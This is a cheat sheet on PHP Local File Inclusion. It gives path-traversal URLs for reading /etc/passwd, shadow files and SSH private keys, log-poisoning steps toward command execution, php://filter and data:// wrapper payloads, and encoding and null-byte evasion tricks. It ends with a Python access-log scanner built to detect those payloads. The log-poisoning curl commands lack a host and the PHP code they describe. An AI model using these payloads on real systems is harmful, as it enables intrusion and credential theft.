# Local File Inclusion

To test for LFI, what we need is a parameter in a URL or another input (for example the request body) that names a file to be included. A URL parameter can look like `https://test.com/?file=robots.txt`; the file name is then changed to something else.

* [Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/)

## PHP Functions

* Functions that provoke an LFI when their argument is user-controlled:

```php
include()
require()
include_once()
require_once()
```

## Usage

* Exploit the URL parameter by including other files.

```
http://example.com/home?page=about.html
http://example.com/home?page=/etc/passwd
```

* Change it to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)

```
http://example.com/home?page=../../../../etc/passwd
```

or

```
http://example.com/home?page=html/../../../home//.ssh/id_rsa
```

### Log Poisoning

* Inject malicious code into log files, then use path traversal to open the log file and trigger the RCE.
* `www-data` needs read and write permission on the log file for this to work.
* Include PHP code in the `User-Agent` header of the HTTP request. For example, a GET parameter can deliver system commands as follows:

```sh
curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: ' -H 'User-Agent: Mozilla/5.0 Firefox/70.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Upgrade-Insecure-Requests: 1'
```

* Follow up with a request to:

```sh
curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
```

### /proc/self/fd

* [outpost24](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2)
* Log poisoning and opening the log file via `/proc/self/fd/xx`.

## Files of Interest

* `/etc/issue`
* `/etc/profile`
* `/proc/version`
* `/etc/passwd`
* `/etc/shadow`
* `/etc/group`
* `/etc/motd`
* `/etc/mysql/my.cnf`
* `/root/.bash_history`
* `/var/log/dmessage`
* `/var/mail/root`
* `/root/.ssh/id_rsa`
* `/var/log/apache2/access.log`
* `C:\boot.ini`
* `/proc/self/fd/xx`
* `/proc/cmdline`
* `/proc/[0-9]*/fd/[0-9]*`
* `sess_` files if the location of the session directory is known. Some paths are:

```sh
c:\Windows\Temp
/tmp/
/var/lib/php5
/var/lib/php/session
```

### Base64 Encoding via PHP

* Circumvent filters by encoding local files that are included via a GET parameter value.
* __Read PHP files by encoding them, so they are not executed__

```sh
curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=.php
curl http://test.com/test.php?file=php://filter/read=string.rot13/resource=/etc/passwd
```

* Use encoded data as input through the parameter:

```sh
curl http://test.com/test.php?file=data://text/plain;base64,dGhlIGFuc3dlciBpcyA0Mgo=
```

## Tricks

* Terminating the query with `%00` or `0x00` (null byte) does the trick up to PHP 5.3.4.
* Terminate the query with `/.`
* `..//..//..//file`, double slashes
* URL-encode the path
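From the defender's side, the same payloads shown under Log Poisoning, Base64 Encoding and Tricks are what a log review should catch. The following is an added example, not code from the original notes: it scans Apache combined-format access-log lines (a constructed sample), undoes the listed evasions (percent and double encoding, backslashes, doubled slashes) before matching, and flags traversal, null bytes, `php://`/`data://` wrappers, sensitive paths, log-file inclusion and a PHP open tag planted in the User-Agent. The indicator names and the sample addresses are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample (Apache combined format); the probes mirror the payloads on this page.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /home?page=about.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /home?page=../../../../etc/passwd HTTP/1.1" 200 1042 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /home?page=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1042 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /test.php?view=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:55 +0000] "GET /test.php?file=data://text/plain;base64,dGhlIGFuc3dlciBpcyA0Mgo= HTTP/1.1" 200 20 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../ HTTP/1.1" 200 9000 "-" "Mozilla/5.0 <?php echo 1; ?>"
"""

# Request line, referer and User-Agent fields of the combined log format.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" \d+ \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Indicator name -> pattern, applied to the normalised request target (order = report order).
INDICATORS = [
    ("path_traversal", re.compile(r"\.\./")),
    ("null_byte", re.compile(r"\x00")),
    ("php_wrapper", re.compile(r"\b(?:php|data):/", re.I)),
    ("sensitive_path", re.compile(r"/etc/(?:passwd|shadow)|/proc/self/fd/|\.ssh/id_rsa|boot\.ini", re.I)),
    ("log_file_include", re.compile(r"/var/log/")),
]

def normalise(target: str) -> str:
    """Undo the Tricks: decode twice (double encoding), unify backslashes, collapse ..//..//."""
    decoded = unquote(unquote(target)).replace("\\", "/")
    return re.sub(r"/{2,}", "/", decoded)

def scan_line(line: str) -> list:
    """Return the indicator names that fire for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = normalise(m.group("target"))
    hits = [name for name, rx in INDICATORS if rx.search(target)]
    # Log poisoning leaves a PHP open tag in the logged User-Agent.
    if "<?php" in m.group("ua").lower() or "<?=" in m.group("ua"):
        hits.append("php_tag_in_user_agent")
    return hits

def scan_log(text: str) -> list:
    """Return (line_number, hits) for every line with at least one indicator."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            findings.append((lineno, hits))
    return findings
```

Running `scan_log(SAMPLE_LOG)` reports lines 2 to 6 and leaves the legitimate `page=about.html` request alone; the null-byte line is only caught because `%00` is decoded before matching.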